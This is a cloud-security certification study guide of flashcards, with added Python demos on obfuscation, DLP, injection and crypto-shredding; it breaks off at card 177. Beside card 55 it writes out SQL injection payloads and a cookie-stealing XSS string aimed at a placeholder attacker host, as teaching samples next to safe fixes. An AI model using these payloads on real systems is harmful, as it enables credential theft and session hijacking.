Study Guide Flashcards

(196 cards)

1
Q

What is Business Impact Analysis (BIA)?

A

A process that assesses and identifies the potential effects of disruptions to a business operation.

2
Q

What does SPOF stand for?

A

Single Point of Failure: a component or system that, if it fails, causes the entire system to fail because nothing redundant can take over its role.

3
Q

What is Quantitative risk assessment?

A

Risk assessment that uses specific numerical values.

4
Q

What is Qualitative risk assessment?

A

Risk assessment that uses non-numerical categories that are relative in nature, such as high, medium, and low.

5
Q

What is risk appetite?

A

Level, amount, or type of risk that the organization finds acceptable.

6
Q

What is residual risk?

A

The remaining risk that exists after countermeasures have been applied.

7
Q

What is IaaS?

A

Service model in which the cloud customer retains the most responsibility and control. The cloud provider is responsible only for the physical facility, hardware, network and virtualization layer; the customer manages the operating system, middleware, applications and data.

8
Q

What is PaaS?

A

Service model in which the cloud customer gives up more control: the cloud provider installs, maintains and administers the operating system and runtime platform as well as the underlying hardware, leaving the customer responsible only for its applications and data.

9
Q

What is SaaS?

A

Service model in which the cloud customer has the least control over the environment. The cloud provider is responsible for all of the underlying hardware and software, up to and including the application itself; the customer still owns its data and remains responsible for how users and access are configured.

10
Q

What is homomorphic encryption?

A

Encryption that allows computation to be performed directly on ciphertext, so a cloud provider can process data without ever decrypting it; decrypting the result yields the same answer as performing the operation on the plaintext.

11
Q

What is defense in depth?

A

A security strategy that involves implementing multiple overlapping layers of security measures to protect an environment.

12
Q

Who is the data owner?

A

Organization that has collected or created the data.

13
Q

What is a data custodian?

A

Person or entity that is tasked with the daily maintenance and administration of the data.

14
Q

What is a data processor?

A

Any org or person who manipulates, stores, or moves the data on behalf of the data owner.

15
Q

What is data discovery?

A

The process of creating an inventory or conducting e-discovery to identify and locate data.

16
Q

What is label-based discovery?

A

A data discovery method that is aided by labels created by the data owner.

17
Q

What is metadata-based discovery?

A

A data discovery method that involves discovering data using metadata traits and characteristics.

18
Q

What is content-based discovery?

A

A data discovery method that inspects the actual content of files or records (for example, pattern matching for credit card numbers or national ID numbers) rather than relying on labels, metadata or predefined categories.

19
Q

What is structured data?

A

Data that is organized and formatted in a way that is easily searchable and can be processed by computers.

20
Q

What is unstructured data?

A

Data with no predefined schema: qualitative data, natural-language text, media (audio, video, images), JSON, XML and binary objects (such as images encoded as text strings). It is typically held in NoSQL or object stores and is important for data-analytics strategies, but it is harder to discover and classify than structured data.

21
Q

What is IRM (Information Rights Management)?

A

A set of controls and technologies used to protect certain types of assets, such as intellectual property or sensitive information.

22
Q

What is copyright?

A

Legal protection for expressions of ideas, such as literary, artistic, or musical works.

23
Q

What is DMCA (Digital Millennium Copyright Act)?

A

Legislation that provides additional protections for creative works in digital formats.

24
Q

What are trademarks?

A

Legal protection for specific words, phrases, symbols, or designs that distinguish a product or service.

25
What is a patent?
A grant of exclusivity that gives the holder the right to produce, sell, and import an invention.
26
What is PKI (Public Key Infrastructure)?
A framework for secure communication using cryptographic techniques, such as digital certificates and public-private key pairs.
27
What is file-based storage?
A method of storing data as files and folders, similar to how data is organized on a traditional file system.
28
What is block storage?
Allocates a large chunk of storage for access as a disk volume managed by the operating system.
29
What is object storage?
Stores files as individual objects managed by the cloud service provider.
30
What is a CDN?
A system that caches commonly requested content in geographically distributed servers to improve performance and reduce latency.
31
What is transparent encryption?
Encryption performed automatically by the database or storage layer, invisible to the application, where the encryption key is stored on the same data store as the data. It protects against theft of the underlying media but not against an attacker who already has access to the running system or its administrator credentials.
32
What is randomization?
The process of replacing data with random characters to make it less predictable and harder to decipher.
33
What is hashing?
The process of deriving a fixed-size value (the hash or digest) from input data using a one-way cryptographic function. The same input always produces the same digest and the input cannot feasibly be recovered from it, which makes hashing useful for integrity checks and for tokenizing data fields. A digest is not strictly unique: distinct inputs can collide, although a secure hash function makes finding collisions computationally infeasible.
34
What is shuffling?
A technique that involves using different entries from the same dataset to represent data, making it harder to identify specific data points.
35
What is masking?
A method of hiding sensitive data by replacing it with useless characters or symbols.
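The four obfuscation techniques on cards 32 to 35 (randomization, hashing, shuffling, masking) are easier to compare side by side. The following is an added example written for this page, not code from the study guide; the records, the key and the field names are constructed for the demonstration. It also shows the practitioner's caveat that a plain hash of a small-space value such as an SSN can be reversed by brute force, which is why the hash is keyed.

```python
import hashlib
import hmac
import random
import string

# Constructed sample records; the people and values are invented for this example.
RECORDS = [
    {"name": "Alice Example", "ssn": "123-45-6789", "email": "alice@example.com", "salary": 91000},
    {"name": "Bob Sample", "ssn": "987-65-4321", "email": "bob@example.com", "salary": 64000},
    {"name": "Cara Test", "ssn": "555-12-3456", "email": "cara@example.com", "salary": 78000},
]

# Demo key only; in production this lives in a KMS/HSM, never next to the data.
DEMO_KEY = b"constructed-demo-key-not-for-production"


def randomize(value, rng):
    """Randomization: replace each character with a random one of the same class
    (digit -> digit, upper -> upper, lower -> lower). Punctuation is kept so the
    format of the field is preserved."""
    out = []
    for ch in value:
        if ch.isdigit():
            out.append(rng.choice(string.digits))
        elif ch.isupper():
            out.append(rng.choice(string.ascii_uppercase))
        elif ch.islower():
            out.append(rng.choice(string.ascii_lowercase))
        else:
            out.append(ch)
    return "".join(out)


def hash_field(value, key):
    """Hashing: keyed HMAC-SHA256 of the value. Deterministic, so the same SSN maps
    to the same token in every table and joins still work; keyed, so an attacker
    who steals the tokens cannot enumerate the roughly one billion possible SSNs
    and look them up (an unkeyed SHA-256 of an SSN is reversible that way)."""
    return hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()


def shuffle_column(records, field, rng):
    """Shuffling: permute one column's values among the records. Every real value
    still exists in the dataset, but it is no longer attached to its real row."""
    values = [r[field] for r in records]
    rng.shuffle(values)
    return [dict(r, **{field: v}) for r, v in zip(records, values)]


def mask(value, keep_last=4, fill="X"):
    """Masking: replace alphanumeric characters with a fill character, keeping only
    the last `keep_last` of them; separators survive (123-45-6789 -> XXX-XX-6789)."""
    alnum_positions = [i for i, ch in enumerate(value) if ch.isalnum()]
    cut = max(len(alnum_positions) - keep_last, 0)
    hide = set(alnum_positions[:cut])
    return "".join(fill if i in hide else ch for i, ch in enumerate(value))


def pseudonymize(records, key=DEMO_KEY, seed=None):
    """Build a non-production copy of the dataset using all four techniques."""
    rng = random.Random(seed)
    shuffled = shuffle_column(records, "salary", rng)
    out = []
    for r in shuffled:
        out.append({
            "name": randomize(r["name"], rng),        # format-preserving random name
            "ssn_token": hash_field(r["ssn"], key),   # joinable token, not reversible
            "ssn_display": mask(r["ssn"]),            # what a help-desk screen shows
            "email": mask(r["email"], keep_last=0),   # fully hidden, format kept
            "salary": r["salary"],                    # real value, wrong row
        })
    return out


if __name__ == "__main__":
    for row in pseudonymize(RECORDS, seed=1):
        print(row)
```

Which technique fits depends on what the downstream consumer needs: shuffling and randomization keep realistic distributions for test and analytics environments, keyed hashing keeps referential integrity across tables, and masking is for display to people who need only the last few characters.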
36
What is SIEM?
Security Information and Event Management: a tool or platform that collects, correlates and analyzes security logs and events from across an organization to support monitoring, alerting and investigation.
37
What is DLP?
Data Loss Prevention: a set of tools and processes that detect sensitive information (by its content, context or label) and prevent its unauthorized access, sharing, exfiltration or loss, for example by blocking an outbound e-mail that contains credit card numbers.
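Content-based discovery (card 18) and DLP (card 37) both rest on the same building block: inspecting content for patterns and validating the hits so that false positives do not flood the queue. The following is an added example written for this page, not code from the study guide; the sample document is constructed, and the card numbers in it are well-known test values rather than real accounts. It finds candidate primary account numbers with a regular expression, confirms them with the Luhn checksum (so a random 16-digit reference number is not flagged), finds e-mail addresses, assigns a classification label, and produces a redacted copy.

```python
import re

# Constructed sample document. 4111 1111 1111 1111 is a standard test card number;
# the other 16-digit values are deliberately not Luhn-valid.
SAMPLE_TEXT = """\
Invoice 1234 for customer jane.doe@example.com
Card on file: 4111 1111 1111 1111 (exp 12/27)
Backup card: 4111-1111-1111-1112
Support ref: 1234567890123456
"""

# Candidate PAN: 13 to 19 digits, optionally separated by single spaces or dashes.
PAN_CANDIDATE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
EMAIL = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")


def luhn_valid(digits):
    """Luhn checksum as used by payment card numbers: doubles every second digit
    from the right, subtracts 9 from doubled values above 9, and requires the sum
    to be a multiple of 10. It catches typos and random digit strings, not fraud."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def _strip(match_text):
    return re.sub(r"[ -]", "", match_text)


def find_pans(text):
    """Return normalized card numbers that match the pattern and pass Luhn."""
    return [_strip(m.group()) for m in PAN_CANDIDATE.finditer(text) if luhn_valid(_strip(m.group()))]


def find_emails(text):
    return EMAIL.findall(text)


def classify(text):
    """Content-based classification: the strongest finding decides the label."""
    pans, emails = find_pans(text), find_emails(text)
    if pans:
        label = "Confidential - PCI"
    elif emails:
        label = "Internal - PII"
    else:
        label = "Public"
    return {"label": label, "pans": pans, "emails": emails}


def redact(text):
    """DLP-style redaction: valid PANs are replaced by asterisks except the last
    four digits; candidates that fail Luhn are left alone."""
    def _mask(m):
        digits = _strip(m.group())
        if not luhn_valid(digits):
            return m.group()
        return "*" * (len(digits) - 4) + digits[-4:]
    return PAN_CANDIDATE.sub(_mask, text)


if __name__ == "__main__":
    print(classify(SAMPLE_TEXT))
    print(redact(SAMPLE_TEXT))
```

In a real DLP deployment the same detector runs at several enforcement points (endpoint, e-mail gateway, CASB, storage scanner), and the Luhn check is what keeps order numbers and ticket IDs from being quarantined as card data.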
38
What is a private cloud?
A distributed computing environment that is dedicated to a single customer or organization.
39
What is a community cloud?
A cloud computing model where resources are shared among a specific affinity group or community.
40
What is portability?
The ease or difficulty of transferring data out of a cloud provider's data center to another environment or provider.
41
What is vendor lock-in?
A situation where a cloud provider uses proprietary data formats or mediums, making it difficult for a customer to switch to another provider.
42
What is vendor lock-out?
The inability to access and recover data due to issues or disputes with a cloud provider.
43
What is a hybrid cloud?
A cloud computing model that combines two or more other cloud models, such as private, public, or community clouds.
44
What is a honeypot?
A decoy system designed to attract attackers, divert them from real assets and record their activity, allowing organizations to gather information about attackers and their methods.
45
What is a vulnerability assessment?
The process of scanning a network or system to identify known vulnerabilities and weaknesses.
46
What is a zero-day vulnerability?
A vulnerability that is unknown to the software vendor or developer, and for which no patch or fix has been released.
47
What is ISO/IEC 27034-1?
The ISO/IEC standard for application security (Part 1: overview and concepts). It defines the Organization Normative Framework (ONF) and Application Normative Framework (ANF) covered on the next two cards.
48
What is the Organization Normative Framework (ONF)?
A framework that defines application security controls and best practices.
49
What are Application Normative Frameworks (ANF)?
Subset of the Organization Normative Framework (ONF) that focuses on specific applications.
50
What is Transport Layer Security (TLS)?
A protocol that provides secure communication between applications over a network, ensuring the confidentiality and integrity of data.
51
What is Secure Socket Layer (SSL)?
The predecessor of TLS: a cryptographic protocol used to encrypt data transmissions between endpoints, such as a web browser and a web server. All SSL versions are deprecated and should be replaced by TLS 1.2 or higher.
52
What is Whole-Disk Encryption?
The process of encrypting the entire disk or storage volume, ensuring that all data stored on it remains encrypted.
53
What is Volume Encryption?
The process of encrypting a specific partition or volume on a hard drive, providing protection for the data stored on that partition.
54
What is Cross-Site Scripting (XSS)?
A type of application vulnerability that allows untrusted data to be included in web pages without proper validation, potentially leading to malicious code execution.
55
What is Injection?
A class of attacks in which a malicious user supplies input that the application passes to an interpreter (SQL, OS shell, LDAP, XML and so on) in a way that lets the input be treated as code or commands rather than data, manipulating the application's behavior or gaining unauthorized access. The root cause is untrusted input concatenated into an interpreter's command instead of being passed as a separate parameter.
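Cards 54 and 55 describe the two most common injection-style flaws in one sentence each; seeing the vulnerable and the hardened form side by side shows why the fix is structural (keep data out of the command) rather than a filter. The following is an added example written for this page, not code from the study guide; the in-memory SQLite database, the user rows and the payload strings are constructed for the demonstration. The SQL half shows a tautology bypass and a UNION leak of password hashes against string concatenation, and the same inputs failing against parameter binding; the HTML half shows output encoding for XSS.

```python
import html
import sqlite3


def build_db():
    """Constructed in-memory database with invented users and fake hash values."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("alice", "h1-alice", "admin"), ("bob", "h2-bob", "user"), ("carol", "h3-carol", "user")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """Untrusted input is pasted into the SQL text, so a quote in the input
    ends the literal and the rest of the input becomes SQL."""
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, username):
    """Parameter binding: the value travels separately from the statement and
    can never become SQL syntax, whatever characters it contains."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker inputs.
TAUTOLOGY = "' OR '1'='1"
UNION_LEAK = "x' UNION SELECT username, password_hash FROM users --"


def render_comment_vulnerable(comment):
    """Reflects user content into HTML unchanged: script tags execute."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    """Output encoding for the HTML context: the browser shows the characters
    instead of interpreting them. Encoding must match the context (HTML body,
    attribute, JavaScript, URL); html.escape covers the body and attributes."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


XSS_PAYLOAD = "<script>document.location='https://attacker.invalid/?c='+document.cookie</script>"


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable, tautology:", lookup_vulnerable(conn, TAUTOLOGY))
    print("vulnerable, union:", lookup_vulnerable(conn, UNION_LEAK))
    print("safe, tautology:", lookup_safe(conn, TAUTOLOGY))
    print(render_comment_safe(XSS_PAYLOAD))
```

The vulnerable lookup returns every user for the tautology and every password hash for the UNION payload; the parameterized lookup returns nothing for either because it searches for a user literally named `' OR '1'='1`. Note that Python's sqlite3 refuses to run more than one statement per execute call, so stacked-query payloads (`'; DROP TABLE ...`) fail here for a reason unrelated to the fix; other drivers do not give that protection.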
56
What is Cross-Site Request Forgery (CSRF)?
An attack that manipulates a logged-on user's browser to send a forged HTTP request along with cookies to generate a request that a vulnerable application thinks is legitimate.
57
What is White-Box Testing (SAST)?
A form of application testing that provides the tester with complete knowledge of the application being tested, including access to source code and design documents.
58
What is Black-Box Testing (DAST)?
A form of application testing that is performed with no knowledge of a system's internals.
59
What is an API?
Application Programming Interface: a defined set of calls and data formats that allows other applications to consume web services and interact with a software system without going through its user interface.
60
What is Nonrepudiation?
No party to a transaction can later claim that they did not take part.
61
What is AICPA?
The national professional organization of Certified Public Accountants in the United States.
62
What is ISO 31000:2009?
The international risk management standard: principles and guidelines for designing and implementing a risk management program. It is distinct from the NIST Risk Management Framework (RMF) on card 64, and ISO 31000:2009 has since been superseded by ISO 31000:2018.
63
What are the principles of ISO 31000:2009?
Eleven principles. Risk management: creates and protects value; is an integral part of all organizational processes; is part of decision making; explicitly addresses uncertainty; is systematic, structured and timely; is based on the best available information; is tailored to the organization; takes human and cultural factors into account; is transparent and inclusive; is dynamic, iterative and responsive to change; and facilitates continual improvement of the organization.
64
What is NIST SP 800-37?
NIST's Risk Management Framework (RMF) for federal information systems: categorize the system, select, implement and assess controls, authorize the system, and monitor it continuously.
65
What is the CSA STAR program?
A program developed by the Cloud Security Alliance (CSA) that provides a framework for evaluating the security of cloud service providers.
66
What is the data lifecycle?
The complete process of creating, storing, using, sharing, archiving, and eventually destroying data.
67
What is data categorization?
The process of grouping data by its type and how it is used (for example, financial, customer or engineering data). Together with classification, which assigns the sensitivity level and the protection required, it is the responsibility of the data owner.
68
What are crypto keys?
Encryption keys used to protect data. They should not be stored with the cloud provider alongside the data they protect; otherwise the provider, or anyone who compromises it, can decrypt the data, and the customer loses the ability to shred the keys independently.
69
What is a regulator?
Create rules governing use of cloud computing.
70
What is transference in risk management?
A risk management strategy that involves transferring or sharing the responsibility for managing risks with another party, such as an insurance provider.
71
What is Critique in the context of copyright?
A form of fair use: criticism, commentary and review are recognized exceptions to copyright that allow limited use of a copyrighted work without the rights holder's permission.
72
What is Anonymization?
A technique used to obscure or de-identify data in the cloud, removing personally identifiable information to protect privacy.
73
What is a Secure Logical Framework?
A set of operating requirements and best practices for ensuring the security of systems and networks.
74
What is Data at rest?
Data stored on persistent media (disks, databases, backups, object storage) rather than being transmitted or actively processed. Because it sits in one place for a long time it is an attractive target and should be encrypted, even when it is not actively being used or accessed.
75
What is the Cloud-Secure Software Deployment Lifecycle (SDLC)?
The process of developing and deploying cloud applications while ensuring their security at every stage of the software development lifecycle.
76
What is Threat Modeling?
A process of identifying, describing and analyzing potential threats to an application or system, including the attackers' capabilities and motivations, so that countermeasures can be designed in before code is written (STRIDE, on card 114, is one common method).
77
What does Industry Standard 5 9's refer to?
The level of uptime and availability expected for critical operations: 99.999%, which allows roughly 5.3 minutes of downtime per year.
78
What is Uptime Institute (UI) Tier I?
Basic Capacity: a single, non-redundant path for power and cooling, with an uninterruptible power supply (UPS), cooling systems and a generator with a minimum of 12 hours of on-site fuel. Any maintenance or component failure causes an outage.
79
What is Uptime Institute (UI) Tier II?
Redundant Capacity Components: Tier I plus redundant (N+1) UPS modules, chillers and generators, so a single capacity component can be replaced or maintained without taking the site down. The distribution path is still single, so work on the path itself still interrupts operations.
80
What is Uptime Institute (UI) Tier III?
Concurrently Maintainable: multiple independent power and cooling distribution paths (only one active at a time) and dual power supplies for all IT equipment, so any component or path can be taken out of service for planned maintenance without interrupting operations.
81
What is Uptime Institute (UI) Tier IV?
Fault Tolerant: multiple active, independent power and cooling paths with redundancy in both the IT and electrical systems, so the site survives an unplanned failure of any single component or path. This is the highest level of fault tolerance and availability.
82
What is Initial training?
A category of security training delivery that focuses on providing basic knowledge and skills to employees or users at the beginning of their engagement with an organization.
83
What is FedRAMP?
A US federal program that mandates standardized approach to security assessments, authorization, and continuous monitoring of cloud products/services.
84
What are the GDPR Principles?
Lawfulness, fairness and transparency; purpose limitation; data minimisation; accuracy; storage limitation; integrity and confidentiality; and accountability (GDPR Article 5). The shorter list sometimes given in study guides (Notice, Choice, Purpose, Access, Integrity, Security, Enforcement) is a paraphrase: transparency, consent, purpose limitation, data-subject access rights, accuracy, security and accountability, respectively.
85
What is Canadian PIPEDA?
A Canadian privacy law that governs the collection, use, and disclosure of personal information.
86
What is the APEC Privacy Framework?
A privacy framework developed by the Asia-Pacific Economic Cooperation (APEC) that provides guidelines for protecting privacy and personal information.
87
What is the Australian Privacy Act?
A privacy law in Australia that regulates the handling of personal information by Australian government agencies and organizations.
88
What is ISO/IEC 27017:2015?
Guide for cloud information security controls.
89
What is ISO/IEC 27001?
Standard for the establishment, implementation, control, and improvement of the Information Security Management System (ISMS).
90
What is NIST 800-92?
NIST Special Publication 800-92, Guide to Computer Security Log Management: guidance for generating, storing, analyzing and disposing of security logs.
91
What is Gap Analysis?
Involves assessing the difference between the current state of a system, process, or organization and its desired future state. It identifies areas where improvements or changes are needed to achieve specific goals.
92
Who is ultimately legally liable for any loss of data in the cloud?
The cloud customer is always ultimately legally liable for any loss of data. This is true even if the cloud provider demonstrates negligence or malice.
93
What are the 6 Steps in the Cloud Data Lifecycle?
1. Create 2. Store 3. Use 4. Share 5. Archive 6. Destroy
94
What is the responsibility of the data owner during the create phase?
Data categorization and classification are the responsibility of the data owner, and they happen in the create phase because every later control (encryption, access, retention, destruction) depends on them.
95
What is the preferred upload method to the cloud?
An IPsec or TLS (1.2 or higher) VPN solution, so that the data is encrypted in transit.
96
What should not be stored with the cloud provider?
It's NOT recommended to store crypto keys with the cloud provider whether the cloud customer chooses to use a CASB or other means of key management.
97
What service model do Personnel Threats, External Threats, and Lack of Specific Skillsets apply to?
IaaS.
98
What service model do Interoperability Issues, Persistent Backdoors, Virtualization, and Resource Sharing apply to?
PaaS.
99
What service model do Proprietary Formats, Virtualization, and Web Application Security apply to?
SaaS.
100
What is a potential emergent business impact analysis (BIA) concern?
New dependencies.
101
What is an Internal Audit?
Audit performed by employees of the organization.
102
What is an External Audit?
Audit performed by auditors outside of the organization.
103
What is Audit Preparation?
Parameters that are discussed and negotiated prior to the start of the audit.
104
What is SOC 1?
SOC Report type: strictly for auditing the financial reporting instruments of a corporation.
105
What is SOC 2?
SOC Report type: Intended to report audits of any controls on an organization's security, availability, processing integrity, confidentiality, and privacy.
106
What is SOC 3?
SOC Report type: Designed to be shared with the public. Seal of approval. Does not contain any actual data about the security controls of the audit target.
107
What should data at rest be?
Data at rest should be encrypted.
108
What is the Defining phase in SDLC?
SDLC Phase focused on identifying the business requirements of the application, such as accounting, database, or customer relationship management.
109
What is the Designing phase in SDLC?
SDLC Phase: Begin to develop user stories (what the user will want to accomplish, what interface will look like and whether it will require the use or development of any APIs).
110
What is the Development phase in SDLC?
SDLC Phase where the code is written.
111
What is the Testing phase in SDLC?
SDLC phase in which activities such as initial penetration testing and vulnerability scanning against the application are performed, using both dynamic testing (DAST, Dynamic Application Security Testing) and static testing (SAST, Static Application Security Testing).
112
What is the Secure Operations phase in SDLC?
SDLC phase in which, after testing has shown the application to be secure, it is deployed and operated; ongoing monitoring, patching, configuration management and periodic re-testing keep it secure over time.
113
What is the Disposal phase in SDLC?
SDLC Phase where app has reached end of life or has been replaced with a newer or different application.
114
What does STRIDE stand for?
S (Spoofing) T (Tampering) R (Repudiation) I (Information Disclosure) D (Denial of Service) E (Elevation of Privilege).
115
What does the Gramm-Leach-Bliley Act (GLBA) allow?
It allows banks to merge with and own insurance companies while ensuring customer account information is kept secure and private.
116
What is the purpose of the Sarbanes-Oxley Act (SOX)?
It increases transparency into publicly traded corporations' financial activities.
117
What does HIPAA protect?
It protects patient records and data.
118
What does FERPA prevent?
It prevents academic institutions from sharing a student's education records, without consent, with anyone other than the student's parents or the student themselves once they are 18 or attending a postsecondary institution.
119
What does the DMCA do?
It includes provisions to protect owned data and makes cracking access controls on copyrighted media a crime.
120
What does the CLOUD Act allow?
It allows US law enforcement and courts to compel American companies to disclose data stored in foreign data centers.
121
What is GDPR?
The EU's General Data Protection Regulation, the most significant personal privacy law in the world. It governs the handling of personal data of data subjects in the EU (residents, not only citizens) and applies to organizations outside the EU that process such data.
122
What is crypto-shredding?
It is the practice of deleting data by deliberately deleting or overwriting the encryption keys.
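Crypto-shredding only works if the data was encrypted under a key the customer controls (card 68 and card 96) and no copy of that key survives. The following is an added example written for this page, not code from the study guide; it uses only the Python standard library, so a toy keystream cipher built from SHA-256 stands in for AES-GCM (do not reuse it in production), and the `CustomerKms` class is an invented stand-in for a customer-controlled KMS or HSM. It shows envelope encryption (a per-record data key wrapped by a per-tenant key-encryption key) and what happens to the stored ciphertext once the tenant key is shredded.

```python
import hashlib
import hmac
import secrets


def keystream_xor(key, nonce, data):
    """Toy stream cipher: SHA-256(key || nonce || counter) blocks XORed into data.
    Stand-in for AES-GCM so the example runs without third-party libraries."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


class CustomerKms:
    """Invented stand-in for a customer-controlled key store (KMS/HSM).
    Only key-encryption keys (KEKs) live here; data keys never leave in the clear."""

    def __init__(self):
        self._keys = {}

    def create_key(self, key_id):
        self._keys[key_id] = secrets.token_bytes(32)

    def get_key(self, key_id):
        return self._keys[key_id]  # KeyError once shredded

    def shred(self, key_id):
        """Crypto-shredding: destroying the KEK makes every record wrapped
        under it, including copies in backups, permanently unreadable."""
        del self._keys[key_id]


def encrypt_record(kms, kek_id, plaintext):
    """Envelope encryption: fresh data key per record, wrapped by the tenant KEK."""
    dek = secrets.token_bytes(32)
    nonce = secrets.token_bytes(16)
    ciphertext = keystream_xor(dek, nonce, plaintext)
    tag = hmac.new(dek, nonce + ciphertext, hashlib.sha256).digest()  # integrity
    wrap_nonce = secrets.token_bytes(16)
    wrapped_dek = keystream_xor(kms.get_key(kek_id), wrap_nonce, dek)
    return {
        "kek_id": kek_id, "wrap_nonce": wrap_nonce, "wrapped_dek": wrapped_dek,
        "nonce": nonce, "ciphertext": ciphertext, "tag": tag,
    }


def decrypt_record(kms, rec):
    """Unwrap the data key with the tenant KEK, verify the tag, then decrypt."""
    try:
        kek = kms.get_key(rec["kek_id"])
    except KeyError:
        raise PermissionError("key shredded: record is unrecoverable")
    dek = keystream_xor(kek, rec["wrap_nonce"], rec["wrapped_dek"])
    expected = hmac.new(dek, rec["nonce"] + rec["ciphertext"], hashlib.sha256).digest()
    if not hmac.compare_digest(expected, rec["tag"]):
        raise ValueError("integrity check failed")
    return keystream_xor(dek, rec["nonce"], rec["ciphertext"])


def crypto_shred_demo(plaintext=b"customer record 42: constructed sample data"):
    """Encrypt, read back, shred the tenant key, and try to read again.
    The ciphertext is never touched; only the key disappears."""
    kms = CustomerKms()
    kms.create_key("tenant-a")
    rec = encrypt_record(kms, "tenant-a", plaintext)
    before = decrypt_record(kms, rec)
    kms.shred("tenant-a")
    try:
        decrypt_record(kms, rec)
        after = "recovered"
    except PermissionError:
        after = "unrecoverable"
    return before, after, rec["ciphertext"] != plaintext


if __name__ == "__main__":
    print(crypto_shred_demo())
```

The practical checks before relying on this as a destruction method: the KEK must exist only inside the customer's KMS or HSM (no exported copies, no KMS backups that outlive the shred), every copy of the data, including backups and replicas, must have been encrypted under that KEK, and the shred itself should be logged as evidence for auditors.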
123
What is degaussing?
It is the destruction of data on a storage device by removing its magnetism.
124
What is a hypervisor?
It is a program used to run and manage one or more virtual machines on a computer.
125
What is orchestration in a virtualized environment?
It is the automatic provisioning, configuring, and managing of virtual machines and other resources.
126
What is key escrow?
It allows cryptographic secrets to be held securely for recovery by authorized parties.
127
What is geofencing?
It is the process of setting virtual geographic boundaries so that a policy is triggered when a device or user enters or leaves an area, for example restricting access, raising an alert or targeting content.
128
What is a toolkit in BC/DR?
It is a secure container with all necessary documentation and resources for a proper response action.
129
What is secrets management?
It allows developers to securely store sensitive data such as passwords and tokens in a secure environment.
130
What are virtualization toolsets?
They provide additional functionality like improved networking or video output for a guest operating system.
131
What is the control plane in networking?
It controls how data packets are forwarded in a network.
132
What is the data plane in networking?
It is responsible for forwarding network packets between source and destination devices.
133
What is a vulnerability scan?
It is the process of identifying security weaknesses and flaws in systems and software.
134
What is Availability Management (AM)?
It ensures that IT services are available at the required level through proactive and reactive measures.
135
What is Release Management (RM)?
It involves planning, scheduling, and controlling the movement of releases to test and live environments.
136
What is Incident Management (IM)?
It restores normal service operations as quickly as possible after an incident.
137
What is Problem Management (PM)?
It identifies and addresses the root cause of incidents to prevent recurrence.
138
What is Recovery Point Objective (RPO)?
It indicates the maximum acceptable data loss and the point in time to which systems must be recovered.
139
What is Recovery Time Objective (RTO)?
It is the targeted duration within which a business process must be restored after a disruption.
140
What is Capacity Management?
It ensures that IT infrastructure has adequate resources to meet current and future demands.
141
What is access control?
It is a system that controls access to information or functionality.
142
What is a reverse proxy?
It is a server that sits in front of one or more backend servers and forwards client requests to them, hiding the backends and often terminating TLS, load balancing and filtering traffic on their behalf.
143
What is a CASB (Cloud Access Security Broker)?
It is a policy enforcement point placed between cloud customers and cloud service providers, on premises or in the cloud, that provides visibility, compliance, data security and threat protection for cloud use. It is often operated by a third party and may also supply IAM services independent of both the CSP and the customer.
144
What is a Hardware Security Module (HSM)?
It is a dedicated device for secure key management and cryptographic operations.
145
What is an Identity Provider (IdP)?
It is a system that authenticates users and provides access tokens.
146
What is the Management Plane?
It allows an admin to remotely manage a fleet of servers and configure cloud resources.
147
What is NIC Teaming?
It combines multiple network interface cards into a single logical interface.
148
What is Distributed Resource Scheduling?
It allocates and manages resources across multiple nodes in distributed systems.
149
What is a Controlled Entry Point?
It is a designated access location regulated for security.
150
What does the CLOUD Act require?
It mandates US companies to provide federal officials with data stored abroad.
151
What is avoidance in risk management?
It involves changing business practices to eliminate potential enterprise risk.
152
What is transference in risk management?
It shifts the risk to another party, typically through insurance.
153
What is acceptance in risk management?
It acknowledges and lives with the risk without intervention.
154
What is mitigation in risk management?
It reduces the impact or likelihood of a risk through proactive measures.
155
What is a Master Service Agreement (MSA)?
It sets the terms for a long-term relationship between two parties.
156
What is a Nondisclosure Agreement (NDA)?
It ensures that one party does not disclose certain confidential information.
157
What is a Business Partnership Agreement (BPA)?
It outlines the terms and responsibilities of a business partnership.
158
What is a Service Level Agreement (SLA)?
It specifies the agreed-upon levels of service between a provider and a client.
159
What is the ECPA (Electronic Communication Privacy Act)?
It restricts the interception of wire, oral and electronic communications and access to stored electronic communications, including by the government, without a warrant or court order.
160
What does the GLBA ensure?
It ensures customer account information is kept secure and private.
161
What does SOX include?
It includes provisions for securing data and protecting shareholders from accounting errors.
162
What is the CCM (Cloud Controls Matrix)?
It is a list of security controls appropriate for cloud environments, cross-referenced to other frameworks.
163
What is a tightly coupled cluster?
It has all storage devices directly connected to a shared physical backplane.
164
What is a loosely coupled cluster?
It allows greater flexibility with each node being independent.
165
What is a cloud broker?
It purchases hosting services from a provider and resells them to customers.
166
What is data mapping?
It normalizes and translates data between organizations to make it meaningful.
167
What is data labeling?
It involves creating, categorizing, and classifying data by the owner.
168
What is horizontal scaling?
It involves adding more servers to meet increased demand.
169
What is vertical scaling?
It involves adding more resources to existing servers to meet increased demand.
170
What is a cloud service provider?
It offers cloud computing services for sale to third parties.
171
What is a cloud customer?
It purchases cloud computing services from cloud service providers.
172
What is a cloud service partner?
It provides add-on services to cloud customers.
173
What is rapid elasticity?
It allows computing resources to be rapidly provisioned or adjusted to meet user demand.
174
What is measured service?
It charges for cloud resources based on the amount used.
175
What is multitenancy?
It allows customers to share computing resources.
176
What is resource pooling?
It pools the provider's CPU, memory, storage and network capacity so that it can be shared among many customers, with resources dynamically assigned and reassigned according to demand.
177
What is a Type 1 hypervisor?
